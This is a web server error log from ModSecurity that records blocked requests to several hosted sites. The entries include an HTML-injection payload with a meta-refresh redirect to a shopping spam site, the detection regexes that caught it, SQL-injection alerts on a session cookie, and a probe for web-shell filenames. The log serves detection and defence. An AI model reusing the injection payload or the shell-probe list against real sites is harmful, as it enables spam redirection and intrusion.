[Mon May 11 22:23:38.887685 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
[Mon May 11 22:23:38.887861 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
[Mon May 11 22:23:38.888298 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
[Mon May 11 22:23:38.888577 2026] [security2:error] [pid 1605480:tid 1605546] [client 27.78.84.116:53395] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI6yh2Cvzd_nyNfUm_9dwAAARg"]
[Mon May 11 22:23:39.148072 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6y3o_DFxNSZVmaX3O1QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:39.148372 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6y3o_DFxNSZVmaX3O1QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:39.751862 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6y3o_DFxNSZVmaX3O1QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:41.547058 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6zXo_DFxNSZVmaX3O1wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:41.547359 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6zXo_DFxNSZVmaX3O1wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:42.131923 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6zXo_DFxNSZVmaX3O1wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:42.739529 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6zno_DFxNSZVmaX3O2AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:42.739804 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6zno_DFxNSZVmaX3O2AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:43.310182 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6zno_DFxNSZVmaX3O2AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:43.821644 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/CDX1.php
[Mon May 11 22:23:43.921308 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/rip.php
[Mon May 11 22:23:44.021292 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-Blogs.php
[Mon May 11 22:23:44.153407 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI60Ho_DFxNSZVmaX3O2QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:44.153684 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI60Ho_DFxNSZVmaX3O2QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:44.258908 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ws83.php
[Mon May 11 22:23:44.634386 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/7.php
[Mon May 11 22:23:44.690525 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI60Ho_DFxNSZVmaX3O2QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:44.737380 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/log.php
[Mon May 11 22:23:44.923454 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/a5.php
[Mon May 11 22:23:44.925254 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI60Ho_DFxNSZVmaX3O2gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:44.925512 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI60Ho_DFxNSZVmaX3O2gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:45.022793 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/jga.php
[Mon May 11 22:23:45.188785 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/k.php
[Mon May 11 22:23:45.316253 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ws77.php
[Mon May 11 22:23:45.403577 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.404019 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.411788 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.416374 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/2.php
[Mon May 11 22:23:45.417416 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.418771 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.419272 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.420450 2026] [security2:error] [pid 1534836:tid 1534887] [client 27.78.84.116:53902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI60deaRXe5lR8y0ZOz6AAAAVA"]
[Mon May 11 22:23:45.449455 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI60Ho_DFxNSZVmaX3O2gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:45.516514 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/abcd.php
[Mon May 11 22:23:45.784192 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/asd.php
[Mon May 11 22:23:45.881400 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/default.php
[Mon May 11 22:23:46.014728 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/gettest.php
[Mon May 11 22:23:46.114310 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/install.php
[Mon May 11 22:23:46.213943 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/tfm.php
[Mon May 11 22:23:46.331151 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ws81.php
[Mon May 11 22:23:46.353805 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI60no_DFxNSZVmaX3O3AAAANE"], referer: https://rentparadise.fr/wp-login.php
